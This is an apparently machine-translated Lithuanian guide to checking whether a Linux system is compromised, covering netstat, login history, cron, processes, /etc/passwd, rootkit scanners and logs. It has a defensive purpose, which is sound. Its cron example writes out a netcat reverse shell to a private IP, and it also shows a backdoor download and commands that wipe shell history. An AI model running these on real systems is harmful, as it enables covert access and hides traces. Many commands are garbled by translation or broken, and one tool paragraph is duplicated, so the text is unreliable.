Kaip nustatyti, ar „Linux“ sistema yra pažeista

Yra daugybė priežasčių, dėl kurių įsilaužėlis kirmė savo kelią į jūsų sistemą ir sukėlė jums rimtų rūpesčių. Prieš daugelį metų galbūt tai turėjo parodyti savo įgūdžius, tačiau šiais laikais tokios veiklos ketinimai gali būti daug sudėtingesni, o aukai gali būti daug platesnių pasekmių. Tai gali atrodyti akivaizdu, tačiau vien dėl to, kad „viskas atrodo gerai“, tai dar nereiškia, kad viskas gerai. Įsilaužėliai gali prasiskverbti į jūsų sistemą, nepranešdami apie tai ir užkrėtę kenkėjiškomis programomis, kad galėtų visiškai kontroliuoti savo veiksmus ir netgi judėti šoniškai. Kenkėjiška programa gali būti paslėpta sistemoje ir įsilaužėliams naudojama kaip užpakalinė arba „Command & Control“ sistema, kad jūsų sistemoje galėtų vykdyti kenkėjišką veiklą.Geriau būti saugiam, nei gailėtis. Galite iš karto nesuvokti, kad jūsų sistema buvo įsilaužta, tačiau yra keletas būdų, kuriais galite nustatyti, ar jūsų sistema yra pažeista. Šiame straipsnyje bus aptariama, kaip nustatyti, ar jūsų „Linux“ sistemą pažeidė neįgaliotas asmuo arba robotas prisijungia prie jūsų sistemos, kad galėtų vykdyti kenkėjišką veiklą.

„Netstat“

„Netstat“ yra svarbi komandinės eilutės TCP / IP tinklo programa, teikianti informaciją ir statistiką apie naudojamus protokolus ir aktyvius tinklo ryšius.

Mes naudosimės netstat nukentėjusio kompiuterio pavyzdyje, norėdami patikrinti, ar nėra įtartinų aktyvių tinklo ryšių, naudodami šią komandą:

[apsaugotas el. paštas]: ~ $ netstat -antp

Čia matysime visus šiuo metu aktyvius ryšius. Dabar mes ieškosime ryšio, kurio ten neturėtų būti.

Štai, aktyvus ryšys PORT 44999 (uostas, kuris neturėtų būti atidarytas).Mes galime pamatyti kitą informaciją apie ryšį, pavyzdžiui, PID, ir programos pavadinimas, kurį ji veikia paskutiniame stulpelyje. Šiuo atveju PID yra 1555 m ir kenksminga naudingoji apkrova, kurią jis vykdo, yra ./ apvalkalas.elfas failą.

Kita komanda, skirta patikrinti, ar uostai šiuo metu klausosi ir yra aktyvūs jūsų sistemoje, yra tokia:

[apsaugotas el. paštas]: ~ $ netstat -la

Tai gana netvarkinga išvestis. Norėdami filtruoti klausomus ir užmegztus ryšius, naudosime šią komandą:

[apsaugotas el. paštas]: ~ $ netstat -la | grep „KLAUSYTI“ „NUSTATYTA“

Tai suteiks tik jums svarbius rezultatus, kad galėtumėte lengviau rūšiuoti šiuos rezultatus. Galime pamatyti aktyvų ryšį uostas 44999 minėtuose rezultatuose.

Atpažinę kenkėjišką procesą, galite nužudyti procesą naudodami šias komandas. Mes pažymėsime PID proceso metu naudodami komandą netstat ir užmuškite procesą naudodami šią komandą:

[apsaugotas el. paštu]: ~ $ kill 1555

~.bash-istorija

„Linux“ registruoja, kurie vartotojai prisijungė prie sistemos, nuo kokio IP, kada ir kiek laiko.

Šią informaciją galite pasiekti naudodami paskutinis komandą. Šios komandos išvestis atrodys taip:

[apsaugotas el. paštas]: ~ $ last

Išvestyje rodomas vartotojo vardas pirmame stulpelyje, terminalas antrame, šaltinio adresas trečiame, prisijungimo laikas ketvirtame stulpelyje ir bendras sesijos laikas, užregistruotas paskutiniame stulpelyje. Šiuo atveju vartotojai usmanas ir ubuntu vis dar esate prisijungę. Jei matote bet kurį seansą, kuris nėra įgaliotas arba atrodo kenkėjiškas, žiūrėkite paskutinę šio straipsnio dalį.

Prisijungimo istorija saugoma ~.bash-istorija failą. Taigi istoriją galima lengvai pašalinti ištrynus .bash-istorija failą. Šį veiksmą užpuolikai dažnai atlieka norėdami nuslėpti savo pėdsakus.

[apsaugotas el. paštas]: ~ $ kat .bash_istorija

Ši komanda parodys jūsų sistemoje vykdomas komandas, o naujausia komanda bus atlikta sąrašo apačioje.

Istoriją galima išvalyti naudojant šią komandą:

[apsaugotas el. paštas]: ~ $ istorija -c

Ši komanda ištrins istoriją tik iš šiuo metu naudojamo terminalo. Taigi, yra teisingesnis būdas tai padaryti:

[apsaugotas el. pašto adresas]: ~ $ cat / dev / null> ~ /.bash_istorija

Tai išvalys istorijos turinį, bet išsaugos failą. Taigi, jei paleidę paskutinis komandą, tai visai nėra geras ženklas. Tai rodo, kad jūsų sistema galėjo būti pažeista ir kad užpuolikas tikriausiai ištrynė istoriją.

Jei įtariate kenkėjišką vartotoją ar IP, prisijunkite kaip tas vartotojas ir vykdykite komandą istorija, taip:

[apsaugotas el. paštas]: ~ $ su
[apsaugotas el. paštas]: ~ $ istorija

Ši komanda parodys komandų istoriją skaitydama failą .bash-istorija viduje konors /namai aplanką. Atsargiai ieškokite wget, garbanoti, arba netcat komandos, jei užpuolikas naudojo šias komandas failams perkelti arba įdiegti išpirkimo įrankius, pvz., kriptografus ar šlamšto robotus.

Pažvelkite į toliau pateiktą pavyzdį:

Aukščiau galite pamatyti komandą „wget https: // github.com / sajith / mod-rootme.“ Šioje komandoje įsilaužėlis bandė pasiekti ne repo failą naudodamas wget atsisiųsti užpakalinę durį, vadinamą „mod-root me“, ir įdiegti ją į savo sistemą. Ši komanda istorijoje reiškia, kad sistema yra pažeista ir ją užpuolikas užpuolė.

Atminkite, kad šį failą galima lengvai pašalinti arba pagaminti jo medžiagą. Šios komandos pateikti duomenys neturi būti vertinami kaip tikroji tikrovė. Tačiau tuo atveju, jei užpuolikas vykdė „blogą“ komandą ir nepaisė evakuoti istorijos, jis bus ten.

Krono darbai

„Cron“ užduotys gali būti svarbiausias įrankis, kai jie sukonfigūruoti užpuoliko mašinoje nustatyti atvirkštinį apvalkalą. Redaguoti „Cron“ darbus yra svarbus įgūdis, taip pat žinoti, kaip į juos žiūrėti.

Norėdami peržiūrėti dabartinio vartotojo vykdomus „cron“ darbus, naudosime šią komandą:

[apsaugotas el. paštas]: ~ $ crontab -l

Norėdami peržiūrėti „cron“ užduotis, vykdomas kitam vartotojui (šiuo atveju - „Ubuntu“), naudosime šią komandą:

[apsaugotas el. paštas]: ~ $ crontab -u ubuntu -l

Norėdami peržiūrėti dienos, valandos, savaitės ir mėnesio „cron“ užduotis, naudosime šias komandas:

Dienos „Cron“ darbai:

[apsaugotas el. pašto adresas]: ~ $ ls -la / etc / cron.kasdien

Valandos „Cron“ darbai:

[apsaugotas el. pašto adresas]: ~ $ ls -la / etc / cron.kas valandą

Savaitės „Cron“ darbai:

[apsaugotas el. pašto adresas]: ~ $ ls -la / etc / cron.kas savaitę

Imk pavyzdį:

Užpuolikas gali įsidarbinti / etc / crontab 10 minučių kas valandą vykdanti kenkėjišką komandą. Užpuolikas taip pat gali paleisti kenkėjišką paslaugą arba atvirkštinį apvalkalo užpakalinį vartą netcat ar koks kitas įrankis. Kai vykdote komandą $ ~ crontab -l, pamatysite, kaip veikia „Cron“ darbas:

[saugomas el. paštas]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44999 “
printf "$ CT" | crontab -
ps aux

Norint tinkamai patikrinti, ar jūsų sistema nebuvo pažeista, taip pat svarbu peržiūrėti vykdomus procesus. Yra atvejų, kai kai kurie neleistini procesai sunaudoja nepakankamai procesoriaus, kad būtų įtraukti į viršuje komandą. Štai kur mes naudosime ps komandą parodyti visus šiuo metu vykstančius procesus.

[apsaugotas el. paštas]: ~ $ ps auxf

Pirmajame stulpelyje rodomas vartotojas, antrame - unikalus proceso ID, o kituose stulpeliuose rodomas procesoriaus ir atminties naudojimas.

Ši lentelė pateiks jums daugiausiai informacijos. Turėtumėte patikrinti kiekvieną vykstantį procesą, norėdami sužinoti ką nors ypatingo, kad žinotumėte, ar sistema yra pažeista, ar ne. Jei jums atrodo kas nors įtartina, „Google“ arba paleiskite jį naudodami lsof komandą, kaip parodyta aukščiau. Tai yra geras įprotis bėgti ps komandas jūsų serveryje ir tai padidins jūsų galimybes rasti ką nors įtartino ar nepatenkinto į jūsų kasdienybę.

/ etc / passwd

The / etc / passwd failas stebi kiekvieną sistemos vartotoją. Tai yra dvitaškiais atskirtas failas, kuriame yra tokia informacija kaip vartotojo vardas, vartotojo vardas, užšifruotas slaptažodis, „GroupID“ (GID), visas vartotojo vardas, vartotojo namų katalogas ir prisijungimo apvalkalas.

Jei užpuolikas įsilaužia į jūsų sistemą, yra tikimybė, kad jis sukurs dar daugiau vartotojų, laikys dalykus atskirai arba sukurs jūsų sistemoje užpakalines duris, kad galėtų grįžti naudodamas šią užpakalinę dalį. Tikrindami, ar jūsų sistema pažeista, taip pat turėtumėte patikrinti kiekvieną vartotoją, esantį / etc / passwd faile. Norėdami tai padaryti, įveskite šią komandą:

[apsaugotas el. paštas]: ~ $ cat etc / passwd

Ši komanda suteiks jums išvestį, panašią į žemiau pateiktą:

„gnome-initial-setup“: x: 120: 65534 :: / run / gnome-initial-setup /: / bin / false
gdm: x: 121: 125: „Gnome“ vaizdų tvarkyklė: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administratorius ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
„lightdm“: x: 125: 132: „Light Display Manager“: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: „Gnome“ vaizdų tvarkyklė: / var / lib / gdm3: / bin / false
anonimas: x: 1002: 1002: ,,,: / home / anonimas: / bin / bash

Dabar norėsite ieškoti bet kurio vartotojo, apie kurį nežinote. Šiame pavyzdyje galite pamatyti vartotoją faile pavadinimu „anonimas."Kitas svarbus dalykas, kurį reikia atkreipti dėmesį į tai, kad jei užpuolikas sukūrė vartotoją, prie kurio prisijungti, vartotojui taip pat bus priskirtas apvalkalas" / bin / bash ". Taigi, galite susiaurinti paiešką, patraukdami šią išvestį:

[apsaugotas el. paštas]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: PostgreSQL administratorius ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
anonimas: x: 1002: 1002: ,,,: / home / anonimas: / bin / bash

Norėdami patobulinti savo išvestį, galite atlikti dar keletą „bash magic“.

[apsaugotas el. paštas]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | iškirpti -d ":" -f 1
usmanas
postgres
ubuntu
Anoniminis

Rasti

Laiku pagrįstos paieškos yra naudingos norint greitai įvertinti. Vartotojas taip pat gali modifikuoti failų keitimo laiko žymes. Norėdami padidinti patikimumą, į kriterijus įtraukite „ctime“, nes jį sugadinti yra daug sunkiau, nes tam reikia modifikuoti kai kurių lygių failus.

Norėdami rasti failus, sukurtus ir modifikuotus per pastarąsias 5 dienas, galite naudoti šią komandą:

[apsaugotas el. paštas]: ~ $ find / -mtime -o -ctime -5

Norėdami rasti visus SUID failus, priklausančius šakniui, ir patikrinti, ar sąrašuose nėra netikėtų įrašų, naudosime šią komandą:

[apsaugotas el. paštas]: ~ $ find / -perm -4000 -user root šaknis -type f

Norėdami rasti visus SGID (nustatyti vartotojo ID) failus, priklausančius šakninei, ir patikrinti, ar sąrašuose nėra netikėtų įrašų, naudosime šią komandą:

[apsaugotas el. paštas]: ~ $ find / -perm -6000 -type f

Chkrootkit

Šaknies rinkiniai yra vienas blogiausių dalykų, kurie gali atsitikti sistemai ir yra vieni pavojingiausių išpuolių, pavojingesni už kenkėjiškas programas ir virusus, tiek dėl sistemos daromos žalos, tiek dėl sunkumų juos surasti ir aptikti.

Jie sukurti taip, kad liktų paslėpti ir atliktų kenkėjiškus veiksmus, pavyzdžiui, vagia kreditines korteles ir internetinės bankininkystės informaciją. Šaknies rinkiniai suteikti kibernetiniams nusikaltėliams galimybę valdyti kompiuterio sistemą. „Rootkits“ taip pat padeda užpuolikui stebėti jūsų klavišų paspaudimus ir išjungti antivirusinę programinę įrangą, o tai dar lengviau pavogti jūsų asmeninę informaciją.

Šio tipo kenkėjiškos programos gali ilgai likti jūsų sistemoje, vartotojui to net nepastebint, ir gali sukelti rimtą žalą. Kartą „Rootkit“ aptinkamas, nėra kito būdo, kaip tik iš naujo įdiegti visą sistemą. Kartais šios atakos gali sukelti aparatūros gedimą.

Laimei, yra keletas įrankių, kurie gali padėti aptikti Šaknies rinkiniai „Linux“ sistemose, tokiose kaip „Lynis“, „Clam AV“ arba LMD („Linux Malware Detect“). Galite patikrinti, ar jūsų sistema yra žinoma Šaknies rinkiniai naudodamiesi toliau pateiktomis komandomis.

Pirmiausia įdiekite Chkrootkit naudodami šią komandą:

[apsaugotas el. paštu]: ~ $ sudo apt install chkrootkit

Tai įdiegs Chkrootkit įrankis. Galite naudoti šį įrankį norėdami patikrinti, ar nėra „Rootkits“, naudodami šią komandą:

[apsaugotas el. paštas]: ~ $ sudo chkrootkit

„Chkrootkit“ paketą sudaro „shell“ scenarijus, tikrinantis sistemos dvejetainius failus, ar nėra modifikuotų „rootkit“, ir kelios programos, tikrinančios įvairias saugos problemas. Minėtu atveju paketas patikrino sistemoje „Rootkit“ ženklą ir jo nerado. Na, tai yra geras ženklas!

„Linux Logs“

„Linux“ žurnalai pateikia „Linux“ darbo sistemos ir programų įvykių tvarkaraštį ir yra svarbi tyrimo priemonė, kai kyla problemų. Pagrindinė užduotis, kurią turi atlikti administratorius, sužinojęs, kad sistema pažeista, turėtų būti išsklaidyti visus žurnalo įrašus.

Sprendžiant konkrečias darbo srities taikymo srities problemas, žurnalų įrašai palaikomi palaikant ryšį su įvairiomis sritimis. Pavyzdžiui, „Chrome“ sudaro strigčių ataskaitas „~ /.chromo / gedimų ataskaitos “), kur darbo srities programa sudaro žurnalus remdamasi inžinieriumi ir parodo, ar programa atsižvelgia į pasirinktinį žurnalo išdėstymą. Įrašai yra/ var / log kataloge. Yra „Linux“ žurnalai viskam: „Framework“, „osa“, „bundle“ vadybininkams, įkrovos formoms, „Xorg“, „Apache“ ir „MySQL“. Šiame straipsnyje tema bus sutelkta tiesiai į „Linux“ pagrindų žurnalus.

Galite pakeisti šį katalogą naudodami kompaktinių diskų tvarką. Norėdami peržiūrėti arba keisti žurnalo failus, turite turėti root teises.

[apsaugotas el. pašto adresas]: ~ $ cd / var / log

„Linux“ žurnalų peržiūros instrukcijos

Norėdami pamatyti reikalingus žurnalo dokumentus, naudokite šias komandas.

„Linux“ žurnalus galima matyti su komanda cd / var / log, tuo metu sudarydami tvarką pamatyti žurnalus, įdėtus po šiuo katalogu. Vienas iš reikšmingiausių žurnalų yra syslog, kuris registruoja daug svarbių žurnalų.

ubuntu @ ubuntu: kačių syslog

Norėdami išvalyti produkciją, mes naudosimemažiau “ komandą.

ubuntu @ ubuntu: kačių syslog | mažiau

Įveskite komandą var / log / syslog pamatyti nemažai dalykų po syslog failas. Dėmesys konkrečiam klausimui užtruks šiek tiek laiko, nes šis įrašas paprastai bus ilgas. Paspauskite „Shift“ + G, kad slinktumėte žemyn įraše į END, pažymėtą „END.“

Taip pat galite pamatyti rąstus naudodami „dmesg“, kuris atspausdina detalės žiedo atramą. Ši funkcija atsispausdina viską ir išsiunčia jus kuo toliau palei dokumentą. Nuo to momento galite panaudoti užsakymą dmesg | mažiau peržvelgti derlingumą. Jei jums reikia matyti duoto vartotojo žurnalus, turėsite paleisti šią komandą:

dmesg - objektas = vartotojas

Apibendrinant, galite naudoti uodegos tvarką norėdami pamatyti žurnalo dokumentus. Tai nedidelis, bet naudingas įrankis, kurį galima naudoti, nes jis naudojamas paskutinei rąstų daliai parodyti ten, kur greičiausiai kilo problema. Taip pat galite nurodyti paskutinių baitų ar eilučių skaičių, rodomą komandoje „tail“. Tam naudokite komandą tail / var / log / syslog. Yra daugybė būdų žiūrėti į žurnalus.

Tam tikram eilučių skaičiui (modelis atsižvelgia į paskutines 5 eilutes) įveskite šią komandą:

[apsaugotas el. paštas]: ~ $ tail -f -n 5 / var / log / syslog

Tai atspausdins naujausias 5 eilutes. Kai ateis kita eilutė, buvusioji bus evakuota. Norėdami atsikratyti uodegos tvarkos, paspauskite „Ctrl“ + X.

Svarbūs „Linux“ žurnalai

Pagrindinius keturis „Linux“ žurnalus sudaro:

Programų žurnalai
Įvykių žurnalai
Aptarnavimo žurnalai
Sistemos žurnalai

ubuntu @ ubuntu: kačių syslog | mažiau

/ var / log / syslog arba / var / log / messages: bendrieji pranešimai, kaip ir su sistema susiję duomenys. Šis žurnalas saugo visą informaciją apie veiksmus visame pasaulyje.

ubuntu @ ubuntu: katės aut.žurnalas | mažiau

/ var / log / auth.žurnalas arba / var / log / secure: saugoti patvirtinimo žurnalus, įskaitant efektyvius ir fizinius prisijungimus bei patvirtinimo strategijas. „Debian“ ir „Ubuntu“ naudojimas / var / log / auth.žurnalas saugoti prisijungimo bandymus, o „Redhat“ ir „CentOS“ naudoja / var / log / secure saugoti autentifikavimo žurnalus.

ubuntu @ ubuntu: katės batai.žurnalas | mažiau

/ var / log / boot.žurnalas: yra informacijos apie paleidimą ir pranešimus paleidimo metu.

ubuntu @ ubuntu: kačių maillog | mažiau

/ var / log / maillog arba / var / log / mail.žurnalas: saugo visus žurnalus, identifikuojamus pašto serveriuose; vertinga, kai jums reikia duomenų apie jūsų serveryje veikiančias „postfix“, „smtpd“ ar bet kokias su el. paštu susijusias administracijas.

ubuntu @ ubuntu: kačių branduolys | mažiau

/ var / log / kern: yra informacijos apie branduolio žurnalus. Šis žurnalas yra svarbus tiriant pasirinktines dalis.

ubuntu @ ubuntu: katinas dmesg | mažiau

/ var / log / dmesg: yra pranešimų, identifikuojančių programėlių tvarkykles. Dmesg tvarka gali būti naudojama norint pamatyti pranešimus šiame įraše.

ubuntu @ ubuntu: katės faillog | mažiau

/ var / log / faillog: yra duomenų apie visus mėginimus prisijungti, vertingus norint surinkti žinių apie bandymus prasiskverbti į saugumą; pavyzdžiui, siekiantiems nulaužti prisijungimo pažymėjimus, lygiai taip pat, kaip užpulti gyvūnai.

ubuntu @ ubuntu: cat cron | mažiau

/ var / log / cron: saugo visus su „Cron“ susijusius pranešimus; pavyzdžiui, „cron“ įdarbinimas arba kai „cron“ demonas pradėjo pašaukimą, susijusius nusivylimo pranešimus ir pan.

ubuntu @ ubuntu: katė yum.žurnalas | mažiau

/ var / log / yum.žurnalas: jei nenorite, kad pristatysite rinkinius naudodami „yum“ užsakymą, šiame žurnale saugomi visi susiję duomenys, kurie gali būti naudingi sprendžiant, ar paketas ir visi segmentai buvo veiksmingai pristatyti.

ubuntu @ ubuntu: katė httpd | mažiau

/ var / log / httpd / arba / var / log / apache2: šie du katalogai naudojami saugoti visų tipų „Apache“ HTTP serverio žurnalus, įskaitant prieigos žurnalus ir klaidų žurnalus. Faile error_log yra visos blogos užklausos, kurias gavo http serveris. Šios klaidos apima atminties problemas ir kitas su sistema susijusias klaidas. „Access_log“ yra visų prašymų, gautų per HTTP, įrašas.

ubuntu @ ubuntu: katė mysqld.žurnalas | mažiau

/ var / log / mysqld.žurnalas arba/ var / log / mysql.žurnalas : „MySQL“ žurnalo dokumentas, kuriame registruojami visi gedimo, derinimo ir sėkmės pranešimai. Tai dar vienas atvejis, kai sistema nukreipia į registrą; „RedHat“, „CentOS“, „Fedora“ ir kitos „RedHat“ pagrįstos sistemos naudoja / var / log / mysqld.log, o Debian / Ubuntu naudoja / var / log / mysql.žurnalų katalogas.

Įrankiai, skirti peržiūrėti „Linux“ žurnalus

Šiandien yra daugybė atvirojo kodo žurnalų stebėjimo priemonių ir tyrimo prietaisų, todėl tinkamų veiksmų žurnalų išteklių parinkimas yra paprastesnis, nei galite įtarti. Nemokami ir atvirojo kodo žurnalų tikrintuvai gali dirbti bet kurioje sistemoje, kad atliktų darbą. Čia yra penki geriausi, kuriuos naudojau praeityje, be jokios konkrečios tvarkos.

Pilkoji dienoraštis

Pradėtas 2011 m. Vokietijoje, „Graylog“ dabar siūlomas kaip atvirojo kodo įrenginys arba verslo susitarimas. „Graylog“ yra sujungta „log-the-board“ sistema, gaunanti informacijos srautus iš skirtingų serverių ar galinių taškų ir leidžianti greitai peržiūrėti ar suskaidyti tuos duomenis.

„Graylog“ sukėlė teigiamą žinomumą tarp rėmų vadovų dėl savo paprastumo ir universalumo. Dauguma interneto įmonių prasideda nedaug, tačiau gali vystytis eksponentiškai. „Graylog“ gali pakoreguoti paketinių serverių sistemą ir kasdien tvarkyti keletą terabaitų žurnalo informacijos.

IT pirmininkai matys, kad „GrayLog“ sąsaja yra lengvai naudojama ir energinga. „Graylog“ veikia pagal prietaisų skydelių idėją, kuri leidžia vartotojams pasirinkti svarbių matavimų tipą ar informacijos šaltinius ir po kurio laiko greitai stebėti nuolydžius.

Atsiradus saugumo ar vykdymo epizodui, IT pirmininkams turi būti suteikta galimybė sekti apraiškas pagrindiniam vairuotojui taip greitai, kaip pagrįstai galima tikėtis. „Graylog“ paieškos funkcija palengvina šią užduotį. Šis įrankis prisitaikė prie vidinių gedimų, galinčių vykdyti daugiasluoksnes įmones, kad galėtumėte kartu suskaidyti kelis galimus pavojus.

NAGIOS

Vieno kūrėjo sukurta 1999 m. „Nagios“ nuo to laiko perėjo į vieną iš patikimiausių atvirojo kodo įrankių, skirtų registruoti žurnalo informaciją. Dabartinis „Nagios“ perdavimas gali būti įdiegtas serveriuose, kuriuose veikia bet kokia operacinė sistema („Linux“, „Windows“ ir kt.).).

Pagrindinis „Nagios“ elementas yra žurnalų serveris, kuris supaprastina informacijos asortimentą ir palaipsniui leidžia duomenis gauti pagrindų vadovams. „Nagios“ žurnalo serverio variklis palaipsniui gaudys informaciją ir perduos ją į novatorišką paieškos įrankį. Įtraukimas į kitą galinį tašką ar programą yra paprastas šio neatidėliotino susitarimo vedlio atpildas.

„Nagios“ dažnai naudojamas asociacijose, kurios turi tikrinti savo apylinkių saugumą ir gali peržiūrėti su sistema susijusių progų apimtį, kad padėtų robotizuoti perspėjimų perdavimą. „Nagios“ gali būti užprogramuota atlikti konkrečias užduotis, kai įvykdoma tam tikra sąlyga, kuri leidžia vartotojams aptikti problemas dar prieš įtraukiant žmogaus poreikius.

Kaip pagrindinį sistemos vertinimo aspektą, „Nagios“ registruos žurnalo informaciją priklausomai nuo geografinės vietovės, kurioje ji prasideda. Norėdami pamatyti žiniatinklio srauto srautą, galima įdiegti visas informacijos suvestines su žemėlapių naujovėmis.

LOGALIZĖ

„Logalyze“ gamina atvirojo kodo įrankius pagrindiniams direktoriams, sisteminiams administratoriams ir saugos specialistams, kad padėtų jiems prižiūrėti serverio žurnalus ir leistų sutelkti dėmesį į žurnalų pavertimą vertinga informacija. Pagrindinis šio įrankio elementas yra tai, kad jį galima nemokamai atsisiųsti namams ar verslui.

Kaip pagrindinį sistemos vertinimo aspektą, „Nagios“ registruos žurnalo informaciją priklausomai nuo geografinės vietovės, kurioje ji prasideda. Norėdami pamatyti žiniatinklio srauto srautą, galite įdiegti visas informacijos suvestines su žemėlapių naujovėmis.

Ką turėtumėte daryti, jei jums kilo kompromisas?

Pagrindinis dalykas nėra panika, ypač jei neteisėtas asmuo yra prisijungęs dabar. Turėtumėte turėti galimybę atgauti mašinos valdymą, kol kitas asmuo nežino, kad žinote apie jį. Jei jie žino, kad žinote apie jų buvimą, užpuolikas gali apsaugoti jus nuo jūsų serverio ir pradėti naikinti jūsų sistemą. Jei nesate toks techninis, tuomet jums tereikia nedelsiant išjungti visą serverį. Serverį galite išjungti naudodami šias komandas:

[apsaugotas el. paštas]: ~ $ shutdown -h now

Arba

[apsaugotas el. paštas]: ~ $ systemctl maitinimas

Kitas būdas tai padaryti yra prisijungti prie savo prieglobos paslaugų teikėjo valdymo skydelio ir jį išjungti. Kai serveris bus išjungtas, galėsite dirbti su reikalingomis užkardos taisyklėmis ir savo laiku pasitarti su visais.

Jei jaučiatės labiau pasitikintys savimi ir jūsų prieglobos paslaugų teikėjas turi ankstesnę ugniasienę, sukurkite ir įgalinkite šias dvi taisykles:

Leisti SSH srautą tik iš jūsų IP adreso.
Blokuokite visa kita, ne tik SSH, bet ir kiekvieną protokolą, veikiantį kiekviename uoste.

Norėdami patikrinti, ar nėra aktyvių SSH seansų, naudokite šią komandą:

[apsaugotas el. paštas]: ~ $ ss | grep ssh

Norėdami nužudyti jų SSH sesiją, naudokite šią komandą:

[apsaugotas el. paštas]: ~ $ kill

Tai užmuš jų SSH sesiją ir suteiks jums prieigą prie serverio. Jei neturite prieigos prie ankstesnės ugniasienės, turėsite sukurti ir įgalinti užkardos taisykles pačiame serveryje. Tada, kai bus nustatytos užkardos taisyklės, nužudykite neteisėto vartotojo SSH sesiją naudodami komandą „kill“.

Paskutinis būdas, jei įmanoma, prisijungti prie serverio naudojant juostos ribų ryšį, pvz., Nuosekliąją konsolę. Sustabdykite visus tinklus naudodami šią komandą:

[apsaugotas el. paštas]: ~ $ systemctl sustabdyti tinklą.paslaugą

Tai visiškai sustabdys bet kokios sistemos prieigą prie jūsų, todėl dabar galėsite įgalinti užkardos valdiklius savo laiku.

Kai atgausite serverio valdymą, juo lengvai nepasitikėkite. Nebandykite taisyti dalykų ir pakartotinai juos naudoti. Kas sugedo, negali būti sutvarkyta. Jūs niekada nežinote, ką gali padaryti užpuolikas, todėl niekada neturėtumėte būti tikri, kad serveris yra saugus. Taigi, iš naujo įdiegti turėtų būti jūsų paskutinis žingsnis.